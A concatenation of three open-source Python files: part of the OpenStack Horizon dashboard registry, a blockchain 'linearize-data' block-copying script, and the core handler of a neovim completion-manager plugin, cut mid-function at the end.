return urlpatterns, self.slug, self.slug
class Dashboard(Registry, HorizonComponent):
""" A base class for defining Horizon dashboards.
All Horizon dashboards should extend from this base class. It provides the
appropriate hooks for automatic discovery of :class:`~horizon.Panel`
modules, automatically constructing URLconfs, and providing role-based
access control.
.. attribute:: name
The name of the dashboard. This will be displayed in the
auto-generated navigation and various other places.
Default: ``''``.
.. attribute:: slug
A unique "short name" for the dashboard. The slug is used as
a component of the URL path for the dashboard. Default: ``''``.
.. attribute:: panels
The ``panels`` attribute can be either a list containing the name
of each panel module which should be loaded as part of this
dashboard, or a dictionary of tuples which define groups of
as in the following example::
class Syspanel(horizon.Dashboard):
panels = {'System Panel': ('overview', 'instances', ...)}
Automatically generated navigation will use the order of the
modules in this attribute. Default: ``[]``.
Panel modules must be listed in ``panels`` in order to be
discovered by the automatic registration mechanism.
.. attribute:: default_panel
The name of the panel which should be treated as the default
panel for the dashboard, i.e. when you visit the root URL
for this dashboard, that's the panel that is displayed.
Default: ``None``.
.. attribute: roles
A list of role names, all of which a user must possess in order
to access any panel registered with this dashboard. This attribute
is combined cumulatively with any roles required on individual
:class:`~horizon.Panel` classes.
.. attribute:: urls
Optional path to a URLconf of additional views for this dashboard
which are not connected to specific panels. Default: ``None``.
.. attribute:: nav
Optional boolean to control whether or not this dashboard should
appear in automatically-generated navigation. Default: ``True``.
.. attribute:: supports_tenants
Optional boolean that indicates whether or not this dashboard includes
support for projects/tenants. If set to ``True`` this dashboard's
naviagtion will include a UI element that allows the user to select
project/tenant. Default: ``False``.
"""
_registerable_class = Panel
name = ''
slug = ''
urls = None
panels = []
default_panel = None
nav = True
supports_tenants = False
def __repr__(self):
return "<Dashboard: %s>" % self.__unicode__()
def get_panel(self, panel):
"""
Returns the specified :class:`~horizon.Panel` instance registered
with this dashboard.
"""
return self._registered(panel)
def get_panels(self):
"""
Returns the :class:`~horizon.Panel` instances registered with this
dashboard in order.
"""
registered = copy.copy(self._registry)
if type(self.panels) is dict:
panels = {}
for heading, items in self.panels.iteritems():
panels.setdefault(heading, [])
for item in items:
panel = self._registered(item)
panels[heading].append(panel)
registered.pop(panel.__class__)
if len(registered):
panels.setdefault(_("Other"), []).extend(registered.values())
else:
panels = []
for item in self.panels:
panel = self._registered(item)
panels.append(panel)
registered.pop(panel.__class__)
panels.extend(registered.values())
return panels
def get_absolute_url(self):
""" Returns the default URL for this dashboard.
The default URL is defined as the URL pattern with ``name="index"``
in the URLconf for the :class:`~horizon.Panel` specified by
:attr:`~horizon.Dashboard.default_panel`.
"""
return self._registered(self.default_panel).get_absolute_url()
@property
def _decorated_urls(self):
urlpatterns = self._get_default_urlpatterns()
self._autodiscover()
default_panel = None
# Add in each panel's views except for the default view.
for panel in self._registry.values():
if panel.slug == self.default_panel:
default_panel = panel
continue
urlpatterns += patterns('',
url(r'^%s/' % panel.slug, include(panel._decorated_urls)))
# Now the default view, which should come last
if not default_panel:
raise NotRegistered('The default panel "%s" is not registered.'
% self.default_panel)
urlpatterns += patterns('',
url(r'', include(default_panel._decorated_urls)))
# Apply access controls to all views in the patterns
roles = getattr(self, 'roles', [])
_decorate_urlconf(urlpatterns, require_roles, roles)
_decorate_urlconf(urlpatterns, _current_component, dashboard=self)
# Return the three arguments to django.conf.urls.defaults.include
return urlpatterns, self.slug, self.slug
def _autodiscover(self):
""" Discovers panels to register from the current dashboard module. """
package = '.'.join(self.__module__.split('.')[:-1])
mod = import_module(package)
panels = []
if type(self.panels) is dict:
[panels.extend(values) for values in self.panels.values()]
else:
panels = self.panels
for panel in panels:
try:
before_import_registry = copy.copy(self._registry)
import_module('.%s.panel' % panel, package)
except:
self._registry = before_import_registry
if module_has_submodule(mod, panel):
raise
@classmethod
def register(cls, panel):
""" Registers a :class:`~horizon.Panel` with this dashboard. """
from horizon import Horizon
return Horizon.register_panel(cls, panel)
@classmethod
def unregister(cls, panel):
""" Unregisters a :class:`~horizon.Panel` from this dashboard. """
from horizon import Horizon
return Horizon.unregister_panel(cls, panel)
class Workflow(object):
def __init__(*args, **kwargs):
raise NotImplementedError()
class LazyURLPattern(SimpleLazyObject):
def __iter__(self):
if self._wrapped is None:
self._setup()
return iter(self._wrapped)
def __reversed__(self):
if self._wrapped is None:
self._setup()
return reversed(self._wrapped)
class Site(Registry, HorizonComponent):
""" The core OpenStack Dashboard class. """
# Required for registry
_registerable_class = Dashboard
name = "Horizon"
namespace = 'horizon'
slug = 'horizon'
urls = 'horizon.site_urls'
def __repr__(self):
return u"<Site: %s>" % self.__unicode__()
@property
def _conf(self):
conf = copy.copy(HORIZON_CONFIG)
conf.update(getattr(settings, 'HORIZON_CONFIG', {}))
return conf
@property
def dashboards(self):
return self._conf['dashboards']
@property
def default_dashboard(self):
return self._conf['default_dashboard']
def register(self, dashboard):
""" Registers a :class:`~horizon.Dashboard` with Horizon."""
return self._register(dashboard)
def unregister(self, dashboard):
""" Unregisters a :class:`~horizon.Dashboard` from Horizon. """
return self._unregister(dashboard)
def registered(self, dashboard):
return self._registered(dashboard)
def register_panel(self, dashboard, panel):
dash_instance = self.registered(dashboard)
return dash_instance._register(panel)
def unregister_panel(self, dashboard, panel):
dash_instance = self.registered(dashboard)
if not dash_instance:
raise NotRegistered("The dashboard %s is not registered."
% dashboard)
return dash_instance._unregister(panel)
def get_dashboard(self, dashboard):
""" Returns the specified :class:`~horizon.Dashboard` instance. """
return self._registered(dashboard)
def get_dashboards(self):
""" Returns an ordered tuple of :class:`~horizon.Dashboard` modules.
Orders dashboards according to the ``"dashboards"`` key in
``settings.HORIZON_CONFIG`` or else returns all registered dashboards
in alphabetical order.
Any remaining :class:`~horizon.Dashboard` classes registered with
Horizon but not listed in ``settings.HORIZON_CONFIG['dashboards']``
will be appended to the end of the list alphabetically.
"""
if self.dashboards:
registered = copy.copy(self._registry)
dashboards = []
for item in self.dashboards:
dashboard = self._registered(item)
dashboards.append(dashboard)
registered.pop(dashboard.__class__)
if len(registered):
extra = registered.values()
extra.sort()
dashboards.extend(extra)
return dashboards
else:
dashboards = self._registry.values()
dashboards.sort()
return dashboards
def get_default_dashboard(self):
""" Returns the default :class:`~horizon.Dashboard` instance.
If ``"default_dashboard"`` is specified in ``settings.HORIZON_CONFIG``
then that dashboard will be returned. If not, the first dashboard
returned by :func:`~horizon.get_dashboards` will be returned.
"""
if self.default_dashboard:
return self._registered(self.default_dashboard)
elif len(self._registry):
return self.get_dashboards()[0]
else:
raise NotRegistered("No dashboard modules have been registered.")
def get_user_home(self, user):
""" Returns the default URL for a particular user.
This method can be used to customize where a user is sent when
they log in, etc. By default it returns the value of
:meth:`get_absolute_url`.
An alternative function can be supplied to customize this behavior
by specifying a either a URL or a function which returns a URL via
the ``"user_home"`` key in ``settings.HORIZON_CONFIG``. Each of these
would be valid::
{"user_home": "/home",} # A URL
{"user_home": "my_module.get_user_home",} # Path to a function
{"user_home": lambda user: "/" + user.name,} # A function
This can be useful if the default dashboard may not be accessible
to all users.
"""
user_home = self._conf['user_home']
if user_home:
if callable(user_home):
return user_home(user)
elif isinstance(user_home, basestring):
# Assume we've got a URL if there's a slash in it
if user_home.find("/") != -1:
return user_home
else:
mod, func = user_home.rsplit(".", 1)
return getattr(import_module(mod), func)(user)
# If it's not callable and not a string, it's wrong.
raise ValueError('The user_home setting must be either a string '
'or a callable object (e.g. a function).')
else:
return self.get_absolute_url()
def get_absolute_url(self):
""" Returns the default URL for Horizon's URLconf.
The default URL is determined by calling
:meth:`~horizon.Dashboard.get_absolute_url`
on the :class:`~horizon.Dashboard` instance returned by
:meth:`~horizon.get_default_dashboard`.
"""
return self.get_default_dashboard().get_absolute_url()
@property
def _lazy_urls(self):
""" Lazy loading for URL patterns.
This method avoids problems associated with attempting to evaluate
the the URLconf before the settings module has been loaded.
"""
def url_patterns():
return self._urls()[0]
return LazyURLPattern(url_patterns), self.namespace, self.slug
def _urls(self):
""" Constructs the URLconf for Horizon from registered Dashboards. """
urlpatterns = self._get_default_urlpatterns()
self._autodiscover()
# Add in each dashboard's views.
for dash in self._registry.values():
urlpatterns += patterns('',
url(r'^%s/' % dash.slug, include(dash._decorated_urls)))
# Return the three arguments to django.conf.urls.defaults.include
return urlpatterns, self.namespace, self.slug
def _autodiscover(self):
""" Discovers modules to register from ``settings.INSTALLED_APPS``.
This makes sure that the appropriate modules get imported to register
themselves with Horizon.
"""
if not getattr(self, '_registerable_class', None):
raise ImproperlyConfigured('You must set a '
'"_registerable_class" property '
'in order to use autodiscovery.')
# Discover both dashboards and panels, in that order
for mod_name in ('dashboard', 'panel'):
for app in settings.INSTALLED_APPS:
mod = import_module(app)
try:
before_import_registry = copy.copy(self._registry)
import_module('%s.%s' % (app, mod_name))
except:
self._registry = before_import_registry
if module_has_submodule(mod, mod_name):
raise
# The one true Horizon
Horizon = Site()
|
|
#!/usr/bin/env python3
#
# linearize-data.py: Construct a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2019 The Starwels developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function, division
import struct
import re
import os
import os.path
import sys
import hashlib
import datetime
import time
from collections import namedtuple
from binascii import hexlify, unhexlify
settings = {}
##### Switch endian-ness #####
def hex_switchEndian(s):
""" Switches the endianness of a hex string (in pairs of hex chars) """
pairList = [s[i:i+2].encode() for i in range(0, len(s), 2)]
return b''.join(pairList[::-1]).decode()
def uint32(x):
return x & 0xffffffff
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return b''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return b''.join(out_words)
def calc_hdr_hash(blk_hdr):
hash1 = hashlib.sha256()
hash1.update(blk_hdr)
hash1_o = hash1.digest()
hash2 = hashlib.sha256()
hash2.update(hash1_o)
hash2_o = hash2.digest()
return hash2_o
def calc_hash_str(blk_hdr):
hash = calc_hdr_hash(blk_hdr)
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hexlify(hash).decode('utf-8')
return hash_str
def get_blk_dt(blk_hdr):
members = struct.unpack("<I", blk_hdr[68:68+4])
nTime = members[0]
dt = datetime.datetime.fromtimestamp(nTime)
dt_ym = datetime.datetime(dt.year, dt.month, 1)
return (dt_ym, nTime)
# When getting the list of block hashes, undo any byte reversals.
def get_block_hashes(settings):
blkindex = []
f = open(settings['hashlist'], "r")
for line in f:
line = line.rstrip()
if settings['rev_hash_bytes'] == 'true':
line = hex_switchEndian(line)
blkindex.append(line)
print("Read " + str(len(blkindex)) + " hashes")
return blkindex
# The block map shouldn't give or receive byte-reversed hashes.
def mkblockmap(blkindex):
blkmap = {}
for height,hash in enumerate(blkindex):
blkmap[hash] = height
return blkmap
# Block header and extent on disk
BlockExtent = namedtuple('BlockExtent', ['fn', 'offset', 'inhdr', 'blkhdr', 'size'])
class BlockDataCopier:
def __init__(self, settings, blkindex, blkmap):
self.settings = settings
self.blkindex = blkindex
self.blkmap = blkmap
self.inFn = 0
self.inF = None
self.outFn = 0
self.outsz = 0
self.outF = None
self.outFname = None
self.blkCountIn = 0
self.blkCountOut = 0
self.lastDate = datetime.datetime(2000, 1, 1)
self.highTS = 1408893517 - 315360000
self.timestampSplit = False
self.fileOutput = True
self.setFileTime = False
self.maxOutSz = settings['max_out_sz']
if 'output' in settings:
self.fileOutput = False
if settings['file_timestamp'] != 0:
self.setFileTime = True
if settings['split_timestamp'] != 0:
self.timestampSplit = True
# Extents and cache for out-of-order blocks
self.blockExtents = {}
self.outOfOrderData = {}
self.outOfOrderSize = 0 # running total size for items in outOfOrderData
def writeBlock(self, inhdr, blk_hdr, rawblock):
blockSizeOnDisk = len(inhdr) + len(blk_hdr) + len(rawblock)
if not self.fileOutput and ((self.outsz + blockSizeOnDisk) > self.maxOutSz):
self.outF.close()
if self.setFileTime:
os.utime(self.outFname, (int(time.time()), self.highTS))
self.outF = None
self.outFname = None
self.outFn = self.outFn + 1
self.outsz = 0
(blkDate, blkTS) = get_blk_dt(blk_hdr)
if self.timestampSplit and (blkDate > self.lastDate):
print("New month " + blkDate.strftime("%Y-%m") + " @ " + self.hash_str)
self.lastDate = blkDate
if self.outF:
self.outF.close()
if self.setFileTime:
os.utime(self.outFname, (int(time.time()), self.highTS))
self.outF = None
self.outFname = None
self.outFn = self.outFn + 1
self.outsz = 0
if not self.outF:
if self.fileOutput:
self.outFname = self.settings['output_file']
else:
self.outFname = os.path.join(self.settings['output'], "blk%05d.dat" % self.outFn)
print("Output file " + self.outFname)
self.outF = open(self.outFname, "wb")
self.outF.write(inhdr)
self.outF.write(blk_hdr)
self.outF.write(rawblock)
self.outsz = self.outsz + len(inhdr) + len(blk_hdr) + len(rawblock)
self.blkCountOut = self.blkCountOut + 1
if blkTS > self.highTS:
self.highTS = blkTS
if (self.blkCountOut % 1000) == 0:
print('%i blocks scanned, %i blocks written (of %i, %.1f%% complete)' %
(self.blkCountIn, self.blkCountOut, len(self.blkindex), 100.0 * self.blkCountOut / len(self.blkindex)))
def inFileName(self, fn):
return os.path.join(self.settings['input'], "blk%05d.dat" % fn)
def fetchBlock(self, extent):
'''Fetch block contents from disk given extents'''
with open(self.inFileName(extent.fn), "rb") as f:
f.seek(extent.offset)
return f.read(extent.size)
def copyOneBlock(self):
'''Find the next block to be written in the input, and copy it to the output.'''
extent = self.blockExtents.pop(self.blkCountOut)
if self.blkCountOut in self.outOfOrderData:
# If the data is cached, use it from memory and remove from the cache
rawblock = self.outOfOrderData.pop(self.blkCountOut)
self.outOfOrderSize -= len(rawblock)
else: # Otherwise look up data on disk
rawblock = self.fetchBlock(extent)
self.writeBlock(extent.inhdr, extent.blkhdr, rawblock)
def run(self):
while self.blkCountOut < len(self.blkindex):
if not self.inF:
fname = self.inFileName(self.inFn)
print("Input file " + fname)
try:
self.inF = open(fname, "rb")
except IOError:
print("Premature end of block data")
return
inhdr = self.inF.read(8)
if (not inhdr or (inhdr[0] == "\0")):
self.inF.close()
self.inF = None
self.inFn = self.inFn + 1
continue
inMagic = inhdr[:4]
if (inMagic != self.settings['netmagic']):
print("Invalid magic: " + hexlify(inMagic).decode('utf-8'))
return
inLenLE = inhdr[4:]
su = struct.unpack("<I", inLenLE)
inLen = su[0] - 80 # length without header
blk_hdr = self.inF.read(80)
inExtent = BlockExtent(self.inFn, self.inF.tell(), inhdr, blk_hdr, inLen)
self.hash_str = calc_hash_str(blk_hdr)
if not self.hash_str in blkmap:
# Because blocks can be written to files out-of-order as of 0.10, the script
# may encounter blocks it doesn't know about. Treat as debug output.
if settings['debug_output'] == 'true':
print("Skipping unknown block " + self.hash_str)
self.inF.seek(inLen, os.SEEK_CUR)
continue
blkHeight = self.blkmap[self.hash_str]
self.blkCountIn += 1
if self.blkCountOut == blkHeight:
# If in-order block, just copy
rawblock = self.inF.read(inLen)
self.writeBlock(inhdr, blk_hdr, rawblock)
# See if we can catch up to prior out-of-order blocks
while self.blkCountOut in self.blockExtents:
self.copyOneBlock()
else: # If out-of-order, skip over block data for now
self.blockExtents[blkHeight] = inExtent
if self.outOfOrderSize < self.settings['out_of_order_cache_sz']:
# If there is space in the cache, read the data
# Reading the data in file sequence instead of seeking and fetching it later is preferred,
# but we don't want to fill up memory
self.outOfOrderData[blkHeight] = self.inF.read(inLen)
self.outOfOrderSize += inLen
else: # If no space in cache, seek forward
self.inF.seek(inLen, os.SEEK_CUR)
print("Done (%i blocks written)" % (self.blkCountOut))
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-data.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
# Force hash byte format setting to be lowercase to make comparisons easier.
# Also place upfront in case any settings need to know about it.
if 'rev_hash_bytes' not in settings:
settings['rev_hash_bytes'] = 'false'
settings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()
if 'netmagic' not in settings:
settings['netmagic'] = 'f9beb4d9'
if 'genesis' not in settings:
settings['genesis'] = '000000003d69a915e9da53348c5c272978bb743442e3a6341c11061c125811a2'
if 'input' not in settings:
settings['input'] = 'input'
if 'hashlist' not in settings:
settings['hashlist'] = 'hashlist.txt'
if 'file_timestamp' not in settings:
settings['file_timestamp'] = 0
if 'split_timestamp' not in settings:
settings['split_timestamp'] = 0
if 'max_out_sz' not in settings:
settings['max_out_sz'] = 1000 * 1000 * 1000
if 'out_of_order_cache_sz' not in settings:
settings['out_of_order_cache_sz'] = 100 * 1000 * 1000
if 'debug_output' not in settings:
settings['debug_output'] = 'false'
settings['max_out_sz'] = int(settings['max_out_sz'])
settings['split_timestamp'] = int(settings['split_timestamp'])
settings['file_timestamp'] = int(settings['file_timestamp'])
settings['netmagic'] = unhexlify(settings['netmagic'].encode('utf-8'))
settings['out_of_order_cache_sz'] = int(settings['out_of_order_cache_sz'])
settings['debug_output'] = settings['debug_output'].lower()
if 'output_file' not in settings and 'output' not in settings:
print("Missing output file / directory")
sys.exit(1)
blkindex = get_block_hashes(settings)
blkmap = mkblockmap(blkindex)
# Block hash map won't be byte-reversed. Neither should the genesis hash.
if not settings['genesis'] in blkmap:
print("Genesis block not found in hashlist")
else:
BlockDataCopier(settings, blkindex, blkmap).run()
|
|
# -*- coding: utf-8 -*-
# For debugging
# NVIM_PYTHON_LOG_FILE=nvim.log NVIM_PYTHON_LOG_LEVEL=INFO nvim
import sys
import os
import re
import copy
import importlib
import cm
import subprocess
import time
import cm_default
import threading
import json
logger = cm.getLogger(__name__)
# use a trick to only register the source withou loading the entire
# module
class CmSkipLoading(Exception):
pass
class CoreHandler(cm.Base):
def __init__(self,nvim):
super().__init__(nvim)
# process control information on channels
self._channel_processes = {}
self._channel_threads = {}
# { '{source_name}': {'startcol': , 'matches'}
self._matches = {}
self._sources = {}
self._subscope_detectors = {}
self._last_startcol = 0
self._last_matches = []
# should be True for supporting display menu directly without cm_refresh
self._has_popped_up = True
self._complete_timer = None
self._last_ctx = None
self._loaded_modules = {}
def cm_setup(self):
# after all sources are registered, so that all channels will be
# started the first time cm_start_channels is called
self.nvim.call('cm#_core_channel_started', self.nvim.channel_id, async=True)
# load configurations
self._servername = self.nvim.vars['_cm_servername']
self._start_py = self.nvim.vars['_cm_start_py_path']
self._py3 = self.nvim.vars['_cm_py3']
self._py2 = self.nvim.eval("get(g:,'python_host_prog','python2')")
self._complete_delay = self.nvim.vars['cm_complete_popup_delay']
self._completed_snippet_enable = self.nvim.vars['cm_completed_snippet_enable']
self._completed_snippet_engine = self.nvim.vars['cm_completed_snippet_engine']
self._multi_thread = int(self.nvim.vars['cm_multi_threading'])
self.cm_detect_modules()
def cm_detect_modules(self):
cm.sync_rtp(self.nvim)
self._detect_sources()
self._load_scopers()
def _load_scopers(self):
scoper_paths = self.nvim.eval("globpath(&rtp,'pythonx/cm_scopers/*.py',1)").split("\n")
# auto find scopers
for path in scoper_paths:
if not path:
continue
try:
modulename = os.path.splitext(os.path.basename(path))[0]
modulename = "cm_scopers.%s" % modulename
if modulename in self._loaded_modules:
continue
self._loaded_modules[modulename] = True
m = importlib.import_module(modulename)
scoper = m.Scoper(self.nvim)
for scope in scoper.scopes:
if scope not in self._subscope_detectors:
self._subscope_detectors[scope] = []
self._subscope_detectors[scope].append(scoper)
logger.info('scoper <%s> imported for %s', modulename, scope)
except Exception as ex:
logger.exception('importing scoper <%s> failed: %s', modulename, ex)
logger.info('_subscope_detectors: %s', self._subscope_detectors)
def _detect_sources(self):
# auto find sources
sources_paths = self.nvim.eval("globpath(&rtp,'pythonx/cm_sources/*.py',1)").split("\n")
for path in sources_paths:
modulename = os.path.splitext(os.path.basename(path))[0]
modulename = "cm_sources.%s" % modulename
if modulename in self._loaded_modules:
continue
# use a trick to only register the source withou loading the entire
# module
def register_source(name,abbreviation,priority,enable=True,events=[],python='python3',multi_thread=None,**kwargs):
channel = dict(type=python,
module=modulename,
events=events)
if not multi_thread is None:
channel['multi_thread'] = multi_thread
source = {}
source['channel'] = channel
source['name'] = name
source['priority'] = priority
source['enable'] = enable
source['abbreviation'] = abbreviation
for k in kwargs:
source[k] = kwargs[k]
logger.info('registering source: %s',source)
self.nvim.call('cm#register_source', source, async=True)
# use a trick to only register the source withou loading the entire
# module
raise CmSkipLoading()
old_handler = cm.register_source
cm.register_source = register_source
try:
# register_source
m = importlib.import_module(modulename)
except CmSkipLoading:
# This is not an error
logger.info('source <%s> registered', modulename)
except Exception as ex:
logger.exception("register_source for %s failed", modulename)
finally:
# restore
cm.register_source = old_handler
def _is_kw_futher_typing(self,info,oldctx,curctx):
old_typed = oldctx['typed']
cur_typed = curctx['typed']
old_len = len(old_typed)
cur_len = len(cur_typed)
if cur_len < old_len:
return False
tmp_ctx1 = copy.deepcopy(oldctx)
tmp_ctx2 = copy.deepcopy(curctx)
if not self._check_refresh_patterns(info,tmp_ctx1,True):
logger.debug('oldctx _check_refresh_patterns failed')
return False
if not self._check_refresh_patterns(info,tmp_ctx2,True):
logger.debug('curctx _check_refresh_patterns failed')
return False
logger.debug('old ctx [%s] cur ctx [%s]', tmp_ctx1, tmp_ctx2)
# startcol is set in self._check_refresh_patterns
return tmp_ctx1['startcol'] == tmp_ctx2['startcol']
def cm_complete(self,srcs,name,ctx,startcol,matches,refresh,outdated,current_ctx):
if isinstance(name,dict):
name = name['name']
if name not in srcs:
logger.error("invalid completion source name [%s]", name)
return
info = srcs[name]
# be careful when completion matches context is outdated
if outdated:
logger.info("[%s] outdated matches, old typed [%s] cur typed[%s]", name, ctx['typed'], current_ctx['typed'])
if refresh:
logger.info("[%s] ignore outdated matching refresh=1", name)
return
if not self._is_kw_futher_typing(info,ctx,current_ctx):
logger.info("[%s] matches is outdated. ignore them.", name)
return
logger.info("[%s] matches is outdated by keyword further typing. I'm gonna keep it.", name)
# adjust for subscope
if ctx['lnum']==1:
startcol += ctx.get('scope_col',1)-1
self._sources = srcs
try:
# process the matches early to eliminate unnecessary complete function call
result = self.process_matches(name,ctx,startcol,matches)
logger.debug('<%s> preprocessing result startcol: %s matches: %s', name, startcol, result)
if (not result) and (not self._matches.get(name,{}).get('last_matches',[])):
# not popping up, ignore this request
logger.debug('Not popping up, not refreshing for cm_complete by %s, startcol %s', name, startcol)
return
finally:
# storing matches
if name not in self._matches:
self._matches[name] = {}
if len(matches)==0:
del self._matches[name]
else:
complete_info = self._matches[name]
complete_info['startcol'] = startcol
complete_info['refresh'] = refresh
complete_info['matches'] = matches
complete_info['context'] = ctx
if outdated and complete_info.get('enable',False):
# outdated, but it is keyword further typing, do not
# override the already enabled matches
complete_info['enable'] = True
else:
complete_info['enable'] = not ctx.get('early_cache',False)
# wait for _complete_timeout, reduce flashes
if self._has_popped_up:
logger.info("update popup for [%s]",name)
# the ctx in parameter maybe a subctx for completion source, use
# nvim.call to get the root context
self._refresh_completions(self.nvim.call('cm#context'))
else:
logger.debug("delay popup for [%s]",name)
def cm_insert_enter(self):
self._matches = {}
self._last_matches = []
self._last_startcol = 0
# complete timer
self._last_ctx = None
if self._complete_timer:
self._complete_timer.cancel()
self._complete_timer = None
def _on_complete_timeout(self,srcs,ctx,*args):
if self._last_ctx!=ctx:
logger.warn("_on_complete_timeout triggered, but last_ctx is %s, param ctx is %s", self._last_ctx, ctx)
return
if not self._has_popped_up:
self._refresh_completions(ctx)
self._has_popped_up = True
else:
logger.debug("ignore _on_complete_timeout for self._has_popped_up")
def cm_refresh(self,srcs,root_ctx,force=0,*args):
root_ctx['scope'] = root_ctx['filetype']
root_ctx['force'] = force
# complete delay timer
self._last_ctx = root_ctx
self._has_popped_up = False
if self._complete_timer:
self._complete_timer.cancel()
self._complete_timer = None
# Note: get_src function asks neovim for data, during which another
# greenlet coroutine could start or run, calculate this as soon as
# possible to avoid concurrent issue
ctx_list = self._get_ctx_list(root_ctx)
self._sources = srcs
if force:
# if this is forcing refresh, clear the cached variable to avoid
# being filtered by the self._complete function
self._last_matches = []
self._last_startcol = 0
# simple complete done
if root_ctx['typed'] == '':
self._matches = {}
elif re.match(r'\s',root_ctx['typed'][-1]):
self._matches = {}
# do notify_sources_to_refresh
refreshes_calls = []
refreshes_channels = []
# get the sources that need to be notified
for ctx_item in ctx_list:
for name in srcs:
ctx = copy.deepcopy(ctx_item)
ctx['early_cache'] = False
ctx['force'] = force
info = srcs[name]
if not info['enable']:
# ignore disabled source
continue
try:
if not self._check_scope(ctx,info):
logger.debug('_check_scope ignore <%s> for context scope <%s>', name, ctx['scope'])
continue
if not force and not info['auto_popup']:
logger.debug('<%s> is not auto_popup', name)
continue
# refresh patterns
if not self._check_refresh_patterns(info,ctx,force):
if not force and info['early_cache'] and self._check_refresh_patterns(info,ctx,True):
# early cache
ctx['early_cache'] = True
logger.debug('<%s> early_caching', name)
else:
logger.debug('cm_refresh ignore <%s>, force[%s] early_cache[%s]', name, force, info['early_cache'])
if name in self._matches:
self._matches[name]['enable'] = False
continue
else:
# enable cached
if name in self._matches:
self._matches[name]['enable'] = True
if (
(name in self._matches) and
not self._matches[name]['refresh'] and
not force and
self._matches[name]['startcol']==ctx['startcol'] and
ctx.get('match_end', '') == self._matches[name]['context'].get('match_end', '')
):
logger.debug('<%s> has been cached, <%s> candidates', name, len(self._matches[name]['matches']))
continue
if 'cm_refresh' in info:
refreshes_calls.append(dict(name=name, context=ctx))
# start channels on demand here
if 'channel' in info:
channel = info['channel']
if 'id' not in channel:
self._start_channel(info)
channel = info.get('channel',{})
if 'id' in channel:
refreshes_channels.append(dict(name=name, id=channel['id'], context=ctx))
except Exception as ex:
logger.exception('cm_refresh exception: %s', ex)
continue
if not refreshes_calls and not refreshes_channels:
logger.info('not notifying any channels, _refresh_completions now')
self._refresh_completions(root_ctx)
self._has_popped_up = True
else:
logger.info('notify_sources_to_refresh calls cnt [%s], channels cnt [%s]',len(refreshes_calls),len(refreshes_channels))
logger.debug('cm#_notify_sources_to_refresh [%s] [%s] [%s]', [e['name'] for e in refreshes_calls], [e['name'] for e in refreshes_channels], root_ctx)
self.nvim.call('cm#_notify_sources_to_refresh', refreshes_calls, refreshes_channels, root_ctx, async=True)
# complete delay timer
def on_timeout():
self.nvim.async_call(self._on_complete_timeout, srcs, root_ctx)
self._complete_timer = threading.Timer(float(self._complete_delay)/1000, on_timeout )
self._complete_timer.start()
def _get_ctx_list(self,root_ctx):
ctx_list = [root_ctx,]
# scoping
i = 0
while i<len(ctx_list):
ctx = ctx_list[i]
scope = ctx['scope']
if scope in self._subscope_detectors:
for detector in self._subscope_detectors[scope]:
try:
sub_ctx = detector.sub_context(ctx, self.get_src(ctx))
if sub_ctx:
# adjust offset to global based and add the new
# context
sub_ctx['scope_offset'] += ctx.get('scope_offset',0)
sub_ctx['scope_lnum'] += ctx.get('scope_lnum',1)-1
if int(sub_ctx['lnum']) == 1:
sub_ctx['typed'] = sub_ctx['typed'][sub_ctx['scope_col']-1:]
sub_ctx['scope_col'] += ctx.get('scope_col',1)-1
logger.info('adjusting scope_col')
ctx_list.append(sub_ctx)
logger.info('new sub context: %s', sub_ctx)
except Exception as ex:
logger.exception("exception on scope processing: %s", ex)
i += 1
return ctx_list
def _check_refresh_patterns(self,info,ctx,force=False):
# Concept of ctx['match_end']:
# for cm_refresh_pattern `\/`, and word pattern `[a-z/]`
# foo/bar gets `foo/`
# foo/bar/baz gets `foo/bar/`
# It is useful for trigerring cm_refresh in the middle of a word
patterns = info.get('cm_refresh_patterns',None)
typed = ctx['typed']
word_pattern = info.get('word_pattern', None) or cm_default.word_pattern(ctx)
# remove the last word, check whether the special pattern matches
# word_removed
end_word_matched = re.search(word_pattern + "$",typed)
if end_word_matched:
ctx['base'] = end_word_matched.group()
ctx['startcol'] = ctx['col'] - len(ctx['base'].encode('utf-8'))
word_removed = typed[:end_word_matched.start()]
word_len = len(ctx['base'])
else:
ctx['base'] = ''
ctx['startcol'] = ctx['col']
word_removed = typed
word_len = 0
ctx['match_end'] = len(word_removed)
# check source extra patterns
if patterns:
for pattern in patterns:
# use greedy match '.*', to push the match to the last occurance
# pattern
if not pattern.startswith("^"):
pattern = '.*' + pattern
matched = re.search(pattern, typed)
if matched and matched.end() >= len(typed)-word_len:
ctx['match_end'] = matched.end()
return True
min_len = info['cm_refresh_length']
# always match
if min_len==0:
return True
if force and word_len>0:
return True
if min_len > 0 and word_len >= min_len:
return True
return False
# almost the same as `s:check_scope` in `autoload/cm.vim`
def _check_scope(self,ctx,info):
scopes = info.get('scopes',None)
cur_scope = ctx.get('scope',ctx['filetype'])
is_root_scope = ( cur_scope==ctx['filetype'] )
ctx['scope_match'] = ''
if not scopes:
# scopes setting is None, means that this is a general purpose
# completion source, only complete for the root scope
if is_root_scope:
return True
else:
return False
for scope in scopes:
if scope==cur_scope:
ctx['scope_match'] = scope
if info.get('scoping',False):
return True
else:
return is_root_scope
return False
def _refresh_completions(self,ctx):
"""
Note: This function is called via greenlet coroutine. Be careful, avoid
using blocking requirest.
"""
matches = []
# sort by priority
names = sorted(self._matches.keys(),key=lambda x: self._sources[x]['priority'], reverse=True)
if len(names)==0:
# empty
logger.info('_refresh_completions names: %s, startcol: %s, matches: %s', names, ctx['col'], [])
self._complete(ctx, ctx['col'], [])
return
col = ctx['col']
startcol = col
# basick processing per source
for name in names:
try:
self._matches[name]['last_matches'] = []
# may be disabled due to early_cache
